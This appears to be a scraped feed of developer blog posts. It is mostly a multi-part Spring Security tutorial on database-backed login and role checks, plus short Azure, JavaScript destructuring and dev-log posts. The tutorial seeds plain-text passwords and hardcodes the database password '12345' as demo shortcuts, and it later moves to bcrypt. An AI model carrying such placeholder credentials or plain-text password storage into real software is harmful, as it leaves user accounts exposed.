102 | john@test.com | John | | $2a$10$IBP9g8pOvNCvkEc7/EG6TO3j6gh49QMuO6uuw9Dd/P9dPRi5mxbiAsnG
103 | sam@test.com | sam | | $2a$10$WxM0l4qnjbYn1Vkgmrbte.hgYqPyHLm/y.9IGvEoiRkrL8.h47QKu
(2 rows)
```
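The stored bcrypt strings above are self-describing. Assuming the standard `$<version>$<cost>$<22-char salt><31-char hash>` layout, the pieces can be pulled apart with plain string handling (a sketch for illustration, not a security utility):

```java
// Minimal reader for bcrypt's storage format: "$2a$10$<22-char salt><31-char hash>".
// No secret is needed to read these fields; only the hash part is hard to reverse.
public class BcryptFormat {
    public static String version(String stored) {
        return stored.split("\\$")[1]; // e.g. "2a"
    }
    public static int cost(String stored) {
        return Integer.parseInt(stored.split("\\$")[2]); // 10 means 2^10 hashing rounds
    }
    public static String salt(String stored) {
        return stored.split("\\$")[3].substring(0, 22); // first 22 chars after the last '$'
    }
}
```

Note the cost factor (`10` here, the `BCryptPasswordEncoder` default) is stored with the hash, so it can be raised later for new passwords without breaking old ones.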
### Configure user details service
To make Spring Security use the database for authentication and authorization, a user details service needs to be implemented. This is simply a class that implements the `UserDetailsService` interface.
This interface has a method named `loadUserByUsername`, which accepts a string parameter and returns a `UserDetails` object.
```java
package org.springframework.security.core.userdetails;
public interface UserDetailsService {
UserDetails loadUserByUsername(String username) throws UsernameNotFoundException;
}
```
Create a class named `DatabaseUserDetailsService.java` which implements the `UserDetailsService` interface.
```java
public class DatabaseUserDetailsService implements UserDetailsService {
@Override
public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException {
return null;
}
}
```
In the overridden method, we do the following:
1. Fetch the user from the database based on the username parameter.
2. Retrieve the role associated with the user.
3. Create an instance of the `User` class with the user details and the associated role.
4. Return the `User` object.
```java
package com.gintophilip.springauth.service;
import com.gintophilip.springauth.entities.ApplicationUser;
import com.gintophilip.springauth.repository.UserRepository;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.security.core.GrantedAuthority;
import org.springframework.security.core.authority.SimpleGrantedAuthority;
import org.springframework.security.core.userdetails.User;
import org.springframework.security.core.userdetails.UserDetails;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.core.userdetails.UsernameNotFoundException;
import org.springframework.stereotype.Service;
import java.util.Collections;
@Service
public class DatabaseUserDetailsService implements UserDetailsService {
@Autowired
UserRepository userRepository;
@Override
public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException {
ApplicationUser user = userRepository.findByEmail(username); //fetch user from db
if(user == null){
throw new UsernameNotFoundException("User Not found");
}
//Retrieve user roles
GrantedAuthority authority = new SimpleGrantedAuthority("ROLE_"+user.getRole().getRoleName());
//create User object
User applicationUser = new User(user.getEmail(),user.getPassword(), Collections.singleton(authority));
return applicationUser;
}
}
```
>The <code>User</code> class implements the <code>UserDetails</code> interface. Spring utilizes the <code>UserDetails</code> to generate an Authentication object. This Authentication object indicates whether the user is authenticated.
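One detail worth noting: the `"ROLE_"` prefix added when building the authority must line up with the `hasRole("ADMIN")` check used in the security configuration, because `hasRole` prepends the prefix itself. A minimal sketch of the convention (plain Java, not Spring's actual implementation):

```java
import java.util.Set;

// Illustrates Spring Security's role-name convention: hasRole("ADMIN") succeeds
// when the user's authorities contain "ROLE_ADMIN", which is why
// DatabaseUserDetailsService prepends "ROLE_" when creating the authority.
public class RoleConvention {
    public static boolean hasRole(Set<String> authorities, String role) {
        return authorities.contains("ROLE_" + role); // hasRole adds the prefix itself
    }
}
```

So storing the role name as plain `ADMIN` in the database and prepending `ROLE_` in code is the combination that makes `hasRole("ADMIN")` work.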
Next, we need to configure an authentication provider.
### Configure the authentication provider
For Spring Security to utilize the `DatabaseUserDetailsService` for retrieving user details, it must be linked to an authentication provider. For that, we will create a bean of type `DaoAuthenticationProvider` in the `SecurityConfig` and bind it to the `DatabaseUserDetailsService`.
First, inject the `DatabaseUserDetailsService`:
```java
@Autowired
DatabaseUserDetailsService databaseUserDetailsService;
```
Next, create an instance of `DaoAuthenticationProvider`, which is an implementation of `AuthenticationProvider` provided by Spring Security. Then,
1. Link the `databaseUserDetailsService`
2. Link the `passwordEncoder`
```java
@Bean
public DaoAuthenticationProvider daoAuthenticationProvider() {
DaoAuthenticationProvider authenticationProvider = new DaoAuthenticationProvider();
//set the user details object
authenticationProvider.setUserDetailsService(databaseUserDetailsService);
//set the password encoder
authenticationProvider.setPasswordEncoder(passwordEncoder());
return authenticationProvider;
}
```
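Conceptually, at login time `DaoAuthenticationProvider` loads the user through the `UserDetailsService` and then delegates the password comparison to the `PasswordEncoder`. A rough, non-Spring sketch of that flow (the names here are illustrative, not Spring's real types):

```java
import java.util.Map;

// Simplified sketch of what DaoAuthenticationProvider does at login time:
// look the user up (UserDetailsService), then compare the submitted password
// against the stored hash (PasswordEncoder.matches).
public class AuthSketch {
    public interface Encoder {
        boolean matches(String raw, String stored);
    }

    public static boolean authenticate(Map<String, String> usersToHashes,
                                       Encoder encoder,
                                       String username, String rawPassword) {
        String stored = usersToHashes.get(username);  // UserDetailsService lookup
        if (stored == null) return false;             // -> UsernameNotFoundException
        return encoder.matches(rawPassword, stored);  // PasswordEncoder comparison
    }
}
```

This is why the bean wires together exactly two collaborators: the user details service and the password encoder.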
After this, the `SecurityConfig` looks as follows.
```java
package com.gintophilip.springauth.web;
import com.gintophilip.springauth.service.DatabaseUserDetailsService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.authentication.dao.DaoAuthenticationProvider;
import org.springframework.security.config.Customizer;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.web.SecurityFilterChain;
@Configuration
@EnableWebSecurity
public class SecurityConfig {
@Autowired
DatabaseUserDetailsService databaseUserDetailsService;
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity securityConfig) throws Exception {
return securityConfig
.authorizeHttpRequests(auth->
auth.requestMatchers("/api/hello")
.permitAll()
.requestMatchers("/api/admin").hasRole("ADMIN")
.anyRequest().authenticated()
).formLogin(Customizer.withDefaults())
.build();
}
@Bean
public PasswordEncoder passwordEncoder(){
return new BCryptPasswordEncoder();
}
@Bean
public DaoAuthenticationProvider daoAuthenticationProvider() {
DaoAuthenticationProvider authenticationProvider = new DaoAuthenticationProvider();
//set the user details object
authenticationProvider.setUserDetailsService(databaseUserDetailsService);
//set the password encoder
authenticationProvider.setPasswordEncoder(passwordEncoder());
return authenticationProvider;
}
}
```
Next, run the application and access the APIs. When the login page appears, use the user details from the `application_user` table.
1. [http://localhost:8080/api/hello](http://localhost:8080/api/hello)
2. [http://localhost:8080/api/protected](http://localhost:8080/api/protected)
3. [http://localhost:8080/api/admin](http://localhost:8080/api/admin)
You will be successfully authenticated and able to view the response.
The `/api/admin` endpoint is only accessible to the user ***sam***.
---
# CORE ARCHITECTURAL COMPONENTS OF AZURE
by preskoya (2024-06-06): https://dev.to/preskoya/core-architectural-components-of-azure-290n
Azure is Microsoft's Cloud computing platform.
It offers a wide range of services including computing, analytics, storage and networking.
Azure infrastructures are spread across the globe in different REGIONS targeting markets with high demand.
Each Region is divided into a minimum of 3 AVAILABILITY ZONES. This arrangement increases fault tolerance through redundancy.
An Availability Zone is made up of one or more datacenters equipped with independent power, cooling and networking infrastructure.
The networking infrastructures are interconnected through high speed fibre optic cables.
Resource Groups and ARM
Resources are managed and organized in Resource Groups through ARM-Azure Resource Manager.
Azure supports the following service models:
1. Infrastructure as a service, IaaS
2. Platform as a service, PaaS
3. Software as a service, SaaS
---

# Spring Security Basics: Implementing Authentication and Authorization-PART 3
by bytegrapher (2024-06-06): https://blog.gintophilip.com/part-3-configuring-security-of-the-api-end-points
Tags: springboot, springsecurity, java, backend

## Configuring security of the API end points
In this section, a custom security configuration needs to be created to secure the API end points. To achieve this, let's go through the following steps.
1. Create the security configuration class
2. Make all APIs accessible only to logged-in users
3. Allow /api/hello to be accessed by anyone
4. Restrict access to /api/admin to user with ADMIN role only
Access to the end points will be configured as follows.
| API | Who can access |
| --- | --- |
| api/hello | anyone |
| api/protected | authenticated users |
| api/admin | admin user |
### Create the security configuration class
To implement a custom security configuration by overriding the default one we need to create a configuration class. This can be done with the help of `@Configuration` annotation.
```java
package com.gintophilip.springauth.web;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.Customizer;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.web.SecurityFilterChain;
@Configuration
@EnableWebSecurity
public class SecurityConfig {
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity securityConfig) throws Exception {
return securityConfig
.authorizeHttpRequests(auth->
auth.anyRequest().authenticated()
).formLogin(Customizer.withDefaults())
.build();
}
}
```
This will serve as our initial configuration. Here, we have mandated that every request must be authenticated. In the coming steps, we will adjust the security settings as required.
>To log in, use the default user created by Spring Security.
### Make all APIs accessible only to logged-in users
There is nothing to do here: the initial configuration we created already satisfies this requirement. Hence we don't need any special configuration for the `/api/protected` endpoint.
### Allow `/api/hello` to be accessed by anyone
```java
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity securityConfig) throws Exception {
return securityConfig
.authorizeHttpRequests(auth->
auth.requestMatchers("/api/hello").permitAll().
anyRequest().authenticated()
).formLogin(Customizer.withDefaults())
.build();
}
```
Now run the application and attempt to access the APIs. The endpoint `/api/hello` is now accessible to everyone, while all other endpoints still require users to log in.
### Restrict access to `/api/admin` to user with the ADMIN role only.
```java
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity securityConfig) throws Exception {
return securityConfig
.authorizeHttpRequests(auth->
auth.requestMatchers("/api/hello")
.permitAll()
.requestMatchers("/api/admin").hasRole("ADMIN")
.anyRequest().authenticated()
).formLogin(Customizer.withDefaults())
.build();
}
```
At this point, the only API endpoint accessible without logging in is `/api/hello`. All other endpoints are protected by the login screen.
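One thing to keep in mind with this configuration: the matcher rules are evaluated top to bottom and the first match wins, which is why the broad `anyRequest().authenticated()` rule comes last. A toy first-match sketch in plain Java (exact-path matching only; Spring's real matchers also support patterns):

```java
import java.util.LinkedHashMap;
import java.util.Map;

// Sketch of first-match rule evaluation, mirroring the order used in
// securityFilterChain above (illustrative, not Spring's implementation).
public class FirstMatch {
    public static String ruleFor(String path) {
        Map<String, String> rules = new LinkedHashMap<>(); // preserves insertion order
        rules.put("/api/hello", "permitAll");
        rules.put("/api/admin", "hasRole(ADMIN)");
        for (Map.Entry<String, String> r : rules.entrySet()) {
            if (path.equals(r.getKey())) return r.getValue(); // first match wins
        }
        return "authenticated"; // the anyRequest() fallback
    }
}
```

If `anyRequest().authenticated()` were declared first, it would shadow the more specific rules below it.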
https://blog.gintophilip.com/series/spring-security-authentication-and-authorization
---
# Spring Security Basics: Implementing Authentication and Authorization-PART 2
by bytegrapher (2024-06-06): https://dev.to/bytegrapher/spring-security-basics-implementing-authentication-and-authorization-part-2-3b6l

## Enable Spring Security
In the previous section, we built a foundational application. In this section, we will enable Spring Security in the application. For that let's do the following steps:
1. Add the Spring Security dependency
2. Restart the application
3. Verify Spring Security is enabled
### Add the Spring Security dependency
To enable Spring Security, the library `org.springframework.boot:spring-boot-starter-security` must be present on the classpath. This can be achieved by adding the library as a dependency in the `build.gradle` file. Note the first item in the dependencies list.
```plaintext
dependencies {
implementation 'org.springframework.boot:spring-boot-starter-security'
implementation 'org.springframework.boot:spring-boot-starter-data-jpa'
implementation 'org.springframework.boot:spring-boot-starter-web'
runtimeOnly 'org.postgresql:postgresql'
testImplementation 'org.springframework.boot:spring-boot-starter-test'
}
```
### Restart the application
Just restart the application. Then go to the next step.
### Verify Spring Security is enabled
Open the browser and attempt to access the API endpoints. If a login page appears for each endpoint you try to access, it confirms that Spring Security is enabled and functioning as expected.

Yeah that's it.
At this point the application is running with the default implementation of Spring Security. You will not be able to access the APIs without entering login credentials. In the default implementation, Spring Security provides a default user with the username **"user"** and a randomly generated password. This generated password can be obtained from the console logs.

Note the line ***Using generated security password: dd05314d-2856-48b4-9c81-fcc480e0b4bf***
The default behavior of Spring Security, unless configured otherwise, is as follows:
* All end points are protected by default when the library `org.springframework.boot:spring-boot-starter-security` is present on the classpath.
* One cannot access the resources without authentication.
* It provides a default user that can be overridden.
In this default setup, the APIs can be accessed by entering the username **user** and the password printed in the console. Try accessing the APIs with the default credentials.
1. [http://localhost:8080/api/hello](http://localhost:8080/api/hello)
2. [http://localhost:8080/api/protected](http://localhost:8080/api/protected)
3. [http://localhost:8080/api/admin](http://localhost:8080/api/admin)
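Besides the form login page, Spring Boot's default security auto-configuration also accepts HTTP Basic authentication (an assumption based on the default setup, useful for testing with curl or Postman), where the same credentials travel in an `Authorization` header. Building that header value is just Base64 encoding, which is also why it is only safe over HTTPS:

```java
import java.util.Base64;

// Builds the Authorization header value used by HTTP Basic authentication:
// "Basic " + base64("username:password"). Base64 is encoding, not encryption.
public class BasicAuthHeader {
    public static String of(String username, String password) {
        String token = Base64.getEncoder()
                .encodeToString((username + ":" + password).getBytes());
        return "Basic " + token;
    }
}
```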
---
# Destructuring with JavaScript
by tassiomed (2024-06-06): https://dev.to/tassiomed/desestruturacao-com-javascript-4nij
Tags: webdev, javascript, beginners, programming

Hello coders! 😁 Today I'm going to talk a bit about destructuring in JavaScript; I hope you enjoy what follows. This is a fairly basic article for anyone who wants to refresh or quickly review the concept, nothing too in-depth.
Destructuring is a feature added in JavaScript ES6. As the name suggests, it **lets you destructure something in a simpler way, pulling out what you need, or "unpacking" it**. We can use it to extract elements from arrays and objects very directly. It's a great option for keeping code clean and concise. Throughout this text, we'll look at a few kinds of destructuring.
## Nested Destructuring
```jsx
const Cachorro = {
nome: 'Bob',
raca: 'Vira-lata',
idade: 5,
dono: {
nomeDono: 'Tássio',
idadeDono: 26,
endereco: {
rua: 'Rua Daora',
numero: 234,
}
}
}
// Accessing the values:
const idade = Cachorro.idade //5
const dono = Cachorro.dono.nomeDono // 'Tássio'
const rua = Cachorro.dono.endereco.rua // 'Rua Daora'
```
Look at the example above. It's a `Cachorro` (dog) object, and it's what we'll work with throughout the article. Note that, to access the values, you have to repeat `Cachorro.` several times.
```jsx
const {
nome,
raca,
idade,
dono: {
nomeDono,
idadeDono,
endereco: { rua, numero }
}
} = Cachorro;
// The destructuring above is equivalent to:
const nome = 'Bob';
const raca = 'Vira-lata';
const idade = 5;
const nomeDono = 'Tássio';
const idadeDono = 26;
const rua = 'Rua Daora';
const numero = 234;
```
Now, with destructuring applied, the process is less laborious. The object's properties are turned into variables directly, without using `Cachorro.` repeatedly. This kind of destructuring is known as **nested** because it deals with objects or arrays that contain other objects or arrays inside them. To extract the properties, you need to "dive" (or "nest") into the structure.
## Destructuring with Aliases
```jsx
const {
nome: nomeCachorro,
raca: racaCachorro,
idade: idadeCachorro,
dono: {
nomeDono: nomeProprietario,
idadeDono: idadeProprietario,
endereco: { rua: ruaDono, numero: numeroCasa }
}
} = Cachorro;
// The destructuring above is equivalent to:
const nomeCachorro = 'Bob';
const racaCachorro = 'Vira-lata';
const idadeCachorro = 5;
const nomeProprietario = 'Tássio';
const idadeProprietario = 26;
const ruaDono = 'Rua Daora';
const numeroCasa = 234;
```
In the code above, the variables were renamed, but the values stay the same. This is alias destructuring, very useful when we want to avoid name collisions in our project or when we need variables with more meaningful names that fit the context.
Note that `nomeCachorro` is a new variable that stores the value of the `nome` property of the `Cachorro` object. It's important to stress that `nomeCachorro` neither changes nor replaces the `nome` property on the `Cachorro` object. Destructuring creates new variables (with different names) for the property values, but the original object remains unchanged.
I've been talking about alias destructuring here, but why is it called "alias"? 🤔
Well, **an "alias" is a nickname; in other words, we are creating nicknames for the object's properties.**
## Rest/Spread Destructuring
### Rest (`...`)
```jsx
const { nome, raca, ...resto } = Cachorro;
// The destructuring above is equivalent to:
const nome = 'Bob';
const raca = 'Vira-lata';
const resto = {
idade: 5,
dono: {
nomeDono: 'Tássio',
idadeDono: 26,
endereco: {
rua: 'Rua Daora',
numero: 234
}
}
};
```
In the example above, `nome` and `raca` were destructured and stored in separate variables, while `resto` is a new object containing all the other properties of the `Cachorro` object. **That's what the rest operator lets you do: capture the remaining properties of an object, or elements of an array, that were not destructured.**
**Below, an example with an array:**
```jsx
const numeracao = [1, 10, 100, 1000, 10000];
const [unidade, dezena, ...resto] = numeracao;
console.log(unidade); // 1
console.log(dezena); // 10
console.log(resto); // [100, 1000, 10000]
```
In `unidade` and `dezena` we take the first two elements of the `numeracao` array, and `resto` is a new array containing all the remaining elements.
### Spread (`...`)
The spread operator (`...`) uses the same symbol as the rest operator, but is used differently. While the rest operator collects remaining elements or properties, **the spread operator expands an object or array.** This is especially useful for copying and combining objects and arrays.
**Example with an object:**
```jsx
const outroDono = { nomeDono: 'Pedro', idadeDono: 30 };
const cachorroComOutroDono = { ...Cachorro, dono: outroDono };
console.log(cachorroComOutroDono);
// { nome: 'Bob', raca: 'Vira-lata', idade: 5, dono: { nomeDono: 'Pedro', idadeDono: 30 } }
```
In the example above:
- The `Cachorro` object is copied using the spread operator (`...Cachorro`), creating a new instance with all the properties of the original object.
- The new object `cachorroComOutroDono` is then combined with the `outroDono` object, where the `dono` property of the `Cachorro` object is replaced by the `dono` property of the `outroDono` object.
**Example with an array:**
```jsx
const vogais = ['a', 'e', 'i'];
const consoantes = ['b', 'c', 'd'];
const letras = [...vogais, ...consoantes];
console.log(letras); // ['a', 'e', 'i', 'b', 'c', 'd']
```
In the example above, the `vogais` array is expanded using the spread operator (`...vogais`), and the same is done with the `consoantes` array. Both arrays are combined into the new `letras` array.
## Functions with Destructuring
With destructuring in functions, you can destructure objects directly in the function's parameters. This makes the function clearer and more readable, especially when you're dealing with complex objects.
```jsx
function printCachorro({
nome,
raca,
idade,
dono: {
nomeDono,
idadeDono,
endereco: { rua, numero }
}
}) {
console.log(`Nome do Cachorro: ${nome}`);
console.log(`Raça: ${raca}`);
console.log(`Idade: ${idade}`);
console.log(`Nome do Dono: ${nomeDono}`);
console.log(`Idade do Dono: ${idadeDono}`);
console.log(`Rua: ${rua}`);
console.log(`Número: ${numero}`);
}
printCachorro(Cachorro);
```
Note that in the `printCachorro` function, instead of accessing `Cachorro.nome`, `Cachorro.raca`, etc., you can access `nome`, `raca`, etc., directly from the parameters. The function defines its parameter as an object whose structure matches the `Cachorro` object. This makes it possible to extract all the needed properties directly when the function is called.
In addition, default values can also be defined for cases where the properties are not present in the object passed to the function.
```jsx
function printCachorro({
nome = 'Desconhecido',
raca = 'Desconhecida',
idade = 0,
dono: {
nomeDono = 'Sem nome',
idadeDono = 0,
endereco: { rua = 'Sem rua', numero = 0 } = {}
} = {}
} = {}) {
console.log(`Nome do Cachorro: ${nome}`);
console.log(`Raça: ${raca}`);
console.log(`Idade: ${idade}`);
console.log(`Nome do Dono: ${nomeDono}`);
console.log(`Idade do Dono: ${idadeDono}`);
console.log(`Rua: ${rua}`);
console.log(`Número: ${numero}`);
}
printCachorro({});
```
In the example above, even if the object passed to the function is empty or missing some property, the function will still work correctly thanks to the default values.
I hope this article has been useful for understanding a bit more about destructuring in JavaScript. Remember that, used the right way, this technique can add a lot to the final result of your work.
If you have anything to recommend, feedback, etc., feel free to share it in the comments! So long, see you in the next article! 🖖🏽😄
---

# Spring Security Basics: Implementing Authentication and Authorization-PART 1
by bytegrapher (2024-06-06): https://dev.to/bytegrapher/spring-security-basics-implementing-authentication-and-authorization-part-1-3b91

## Create the base application
Before proceeding to the implementation of authentication and authorization, let's create a simple application to serve as a foundation. The application will have the following API end points.
1. `GET /api/hello`
2. `GET /api/protected`
3. `GET /api/admin`
A database is also required. This setup uses a **PostgreSQL** database; you are free to choose your own.
>Don't forget to create a database named <code>spring_access_db</code> in your favorite database tool.
Let's go through the following steps to build the foundation.
1. Create the project
2. Implement the API end points
3. Create user and role entities
4. Create user and role repositories
5. Configure database connectivity
6. Populate database with sample users
7. Run the application
8. Verify users and roles are created by querying the database
9. Try accessing the API end points
### Create the project
To create the project, go to [https://start.spring.io/](https://start.spring.io/) and create a sample project with the following dependencies.
* **Spring Web**
* **Spring Data JPA**
* **PostgreSQL Driver**
> If you are using <strong><em>IntelliJ IDEA Ultimate</em></strong> or <strong><em>Visual Studio Code</em></strong> you can create the project within the IDE.
>Create project with IntelliJ IDEA Ultimate: [Click here for doc](https://www.jetbrains.com/help/idea/your-first-spring-application.html)
>Create project with Visual Studio Code: [Click here for doc](https://code.visualstudio.com/docs/java/java-spring-boot)
Here I used the Spring initializer and opened the project in IntelliJ IDEA (Community Edition)

1. Add the dependencies
2. Fill up the project metadata
3. Generate the Zip file and extract it.
4. Then open it in your IDE.
### Implement the API end points
Create a class named **ApiController** and implement the APIs there.
* **ApiController.java**
```java
package com.gintophilip.springauth.controller;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController
@RequestMapping("/api")
public class ApiController {
@GetMapping("/hello")
public ResponseEntity<String> hello() {
return ResponseEntity.ok("Hello");
}
@GetMapping("/protected")
public ResponseEntity<String> protectedResource() {
String message = """
This is a protected resource <br>
You are seeing this because you are an authenticated user
""";
return ResponseEntity.ok(message);
}
@GetMapping("/admin")
public ResponseEntity<String> admin() {
String message = "Hello Admin";
return ResponseEntity.ok(message);
}
}
```
### Create user and role entities
Create two classes for modeling the user and role entities.
**ApplicationUser.java**
```java
package com.gintophilip.springauth.entities;
import jakarta.persistence.*;
@Entity
public class ApplicationUser {
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
private String firstName;
private String lastName;
@Column(unique = true)
private String email;
private String password;
@ManyToOne
@JoinTable(name = "user_roles")
private Roles role;
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public String getFirstName() {
return firstName;
}
public void setFirstName(String firstName) {
this.firstName = firstName;
}
public String getLastName() {
return lastName;
}
public void setLastName(String lastName) {
this.lastName = lastName;
}
public String getEmail() {
return email;
}
public void setEmail(String email) {
this.email = email;
}
public String getPassword() {
return password;
}
public void setPassword(String password) {
this.password = password;
}
public Roles getRole() {
return role;
}
public void setRole(Roles role) {
this.role = role;
}
}
```
**Roles.java**
```java
package com.gintophilip.springauth.entities;
import jakarta.persistence.*;
@Entity
public class Roles {
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
@Column(unique = true)
private String roleName;
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public String getRoleName() {
return roleName;
}
public void setRoleName(String roleName) {
this.roleName = roleName;
}
}
```
### Create user and role repositories
**UserRepository.java**
```java
package com.gintophilip.springauth.repository;
import com.gintophilip.springauth.entities.ApplicationUser;
import org.springframework.data.jpa.repository.JpaRepository;
public interface UserRepository extends JpaRepository<ApplicationUser,Long> {
ApplicationUser findByEmail(String email);
}
```
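No query needs to be written for `findByEmail`: Spring Data derives it from the method name, producing roughly a `where email = ?` query against the entity. A toy sketch of that name-to-query translation (illustrative only, not Spring Data's real parser):

```java
// Toy illustration of derived-query naming: "findByEmail" -> a JPQL query
// filtering on the "email" property of the entity.
public class QueryDerivation {
    public static String toJpql(String methodName, String entity) {
        String property = methodName.replaceFirst("findBy", "");
        // lower-case the first letter to get the bean property name
        property = Character.toLowerCase(property.charAt(0)) + property.substring(1);
        return "select u from " + entity + " u where u." + property + " = ?1";
    }
}
```

This is why the method name must match an entity property (`email` on `ApplicationUser`); a typo in the name fails at startup rather than at query time.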
**RoleRepository.java**
```java
package com.gintophilip.springauth.repository;
import com.gintophilip.springauth.entities.Roles;
import org.springframework.data.jpa.repository.JpaRepository;
public interface RoleRepository extends JpaRepository<Roles,Long> {
}
```
### Configure database connectivity
Let's configure the connection to the database named `spring_access_db` with the following settings:
username: **postgres**
password: **12345**
For configuring the database connectivity update the **application.properties** file as follows.
```plaintext
spring.datasource.url=jdbc:postgresql://localhost:5432/spring_access_db
spring.datasource.username=postgres
spring.datasource.password=12345
spring.jpa.properties.hibernate.dialect = org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto = update
```
>If you are using a different database, please ensure that the connection URL and the Hibernate dialect are updated to correspond with your specific database.
### Populate database with sample users
Let's create a class which implements the `CommandLineRunner` interface. Its `run` method will be executed once the application is ready.
**DatabaseUtilityRunner.java**
```java
package com.gintophilip.springauth;
import com.gintophilip.springauth.entities.ApplicationUser;
import com.gintophilip.springauth.entities.Roles;
import com.gintophilip.springauth.repository.RoleRepository;
import com.gintophilip.springauth.repository.UserRepository;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.CommandLineRunner;
import org.springframework.stereotype.Component;
@Component
public class DataBaseUtilityRunner implements CommandLineRunner {
@Autowired
UserRepository usersRepository;
@Autowired
RoleRepository rolesRepository;
@Override
public void run(String... args) throws Exception {
try {
Roles userRole = new Roles();
userRole.setRoleName("USER");
Roles adminRole = new Roles();
adminRole.setRoleName("ADMIN");
rolesRepository.save(userRole);
rolesRepository.save(adminRole);
ApplicationUser user1 = new ApplicationUser();
user1.setFirstName("John");
user1.setEmail("john@test.com");
user1.setPassword("123456");
user1.setRole(userRole);
ApplicationUser adminUser = new ApplicationUser();
adminUser.setFirstName("sam");
adminUser.setEmail("sam@test.com");
adminUser.setPassword("12345");
adminUser.setRole(adminRole);
usersRepository.save(user1);
usersRepository.save(adminUser);
}catch (Exception exception){
// ignored: the sample roles and users may already exist from a previous run
}
}
}
```
### Verify users and roles are created by querying the database
As a result of the previous step, three tables will be created in the `spring_access_db` database once the application runs.
Here I use the psql CLI client to view and query the database.
**List of tables**
```bash
spring_access_db-# \dt
List of relations
Schema | Name | Type | Owner
--------+------------------+-------+----------
public | application_user | table | postgres
public | roles | table | postgres
public | user_roles | table | postgres
(3 rows)
```
**Table: application\_user**
**Query:** `select * from application_user;`
```bash
spring_access_db=# select * from application_user;
id | email | first_name | last_name | password
----+---------------+------------+-----------+----------
1 | john@test.com | John | | 123456
2 | sam@test.com | sam | | 12345
(2 rows)
```
In this example, the password is stored in clear text. In a real-world scenario, it is essential to store passwords in an encrypted form rather than as plain text. We'll do this later.
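One-way hashing is the usual remedy; in Spring that is typically done with a `PasswordEncoder` such as BCrypt, which this series configures later. Purely as an illustration of the idea, here is a stdlib-only Java sketch — the class name is hypothetical, and SHA-256 on its own is *not* a substitute for a real password encoder:

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

public class HashSketch {
    // Returns the lowercase hex SHA-256 digest of the input.
    static String sha256Hex(String input) {
        try {
            MessageDigest md = MessageDigest.getInstance("SHA-256");
            byte[] digest = md.digest(input.getBytes(StandardCharsets.UTF_8));
            StringBuilder sb = new StringBuilder();
            for (byte b : digest) {
                sb.append(String.format("%02x", b));
            }
            return sb.toString();
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        // A stored digest reveals nothing obvious about the original "123456".
        System.out.println(sha256Hex("123456"));
    }
}
```

With a digest stored instead of the raw password, the `select * from application_user;` output above would no longer leak credentials to anyone who can read the table.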
**Table: roles**
**Query:**`select * from roles;`
```bash
spring_access_db=# select * from roles;
id | role_name
-----+-----------
802 | USER
803 | ADMIN
(2 rows)
```
**Table: user\_roles**
**Query:**`select * from user_roles;`
```bash
spring_access_db=# select * from user_roles;
role_id | id
---------+----
802 | 1
803 | 2
(2 rows)
```
### Run the application
Now run the application. Once it is up and running, open the browser and try to access the API endpoints.
1. [http://localhost:8080/api/hello](http://localhost:8080/api/hello)
2. [http://localhost:8080/api/protected](http://localhost:8080/api/protected)
3. [http://localhost:8080/api/admin](http://localhost:8080/api/admin)
You will be able to access all the APIs without any restrictions. This completes the setup of the base application.
In the coming steps, we'll see how to protect these endpoints by integrating authentication and authorization mechanisms using Spring Security.
--- | bytegrapher | |
1,879,734 | [Game of Purpose] Day 19 | Today I spent my evening programming other stuff, so no progress :/ | 27,434 | 2024-06-06T23:31:15 | https://dev.to/humberd/game-of-purpose-day-19-36g1 | gamedev | Today I spent my evening programming other stuff, so no progress :/ | humberd |
1,879,544 | Spring Security Basics: Implementing Authentication and Authorization | Hello everyone, this document will guide you through the process of integrating authentication and... | 0 | 2024-06-06T23:30:00 | https://blog.gintophilip.com/series/spring-security-authentication-and-authorization | beginners, java, springboot, springsecurity | Hello everyone, this document will guide you through the process of integrating authentication and authorization mechanisms into a Spring Boot web application using Spring Security. The following topics will be covered:
1. ### PART 1: Create the base application
    1. Create the project.
    2. Implement the API endpoints.
    3. Create user and role entities.
    4. Create user and role repositories.
    5. Configure database connectivity.
    6. Populate the database with sample users.
    7. Verify users and roles are created by querying the database.
    8. Run the application.
2. ### PART 2: Enable Spring Security
    1. Add the Spring Security dependency.
    2. Restart the application.
    3. Verify Spring Security is enabled.
3. ### PART 3: Configure security of the API endpoints
    1. Create the security configuration class.
    2. Require all APIs to be accessed only by logged-in users.
    3. Allow /api/hello to be accessed by anyone.
    4. Restrict access to /api/admin to users with the ADMIN role only.
4. ### PART 4: Integrate the database with Spring Security
    1. Add the password encoder bean.
    2. Update the plain-text passwords to encrypted passwords.
    3. Configure the user details service.
    4. Configure the authentication provider.
Before diving in, let's look at what the following terms mean:
* Authentication
* Authorization
* User details service
* Authentication provider
### Authentication
Authentication is the process of proving that someone is who they claim to be. Authentication can be performed in several ways, such as with a username and password, a fingerprint, a token, etc.
To authenticate against an application, a user must have valid credentials. When these credentials are provided to the application for access, the application verifies them against the database where the credentials are stored. If the credentials match, the authentication is successful and the user can proceed to use the application.
### Authorization
